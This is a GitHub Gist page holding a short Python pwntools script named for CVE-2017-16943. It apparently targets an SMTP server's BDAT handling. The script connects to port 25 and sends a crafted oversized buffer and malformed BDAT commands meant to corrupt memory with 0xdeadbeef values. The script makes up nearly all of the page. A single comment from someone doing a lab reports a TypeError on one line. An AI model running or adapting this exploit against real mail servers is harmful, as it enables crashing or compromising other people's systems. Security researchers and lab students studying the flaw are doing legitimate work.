-
-
Save andreafortuna/96a2105823337f7b453ebd0484a3d5f7 to your computer and use it in GitHub Desktop.
CVE-2017-16943.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# pip install pwntools | |
from pwn import * | |
r = remote('localhost', 25) | |
r.recvline() | |
r.sendline("EHLO test") | |
r.recvuntil("250 HELP") | |
r.sendline("MAIL FROM:<test@localhost>") | |
r.recvline() | |
r.sendline("RCPT TO:<test@localhost>") | |
r.recvline() | |
#raw_input() | |
r.sendline('a'*0x1100+'\x7f') | |
#raw_input() | |
r.recvuntil('command') | |
r.sendline('BDAT 1') | |
r.sendline(':BDAT \x7f') | |
s = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8) | |
r.send(s+ ':\r\n') | |
r.recvuntil('command') | |
#raw_input() | |
r.send('\n') | |
r.interactive() | |
exit() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
I'm doing a lab that I think involves this but line #19 consistently fails with error
TypeError: can't multiply sequence by non-int of type 'float'
?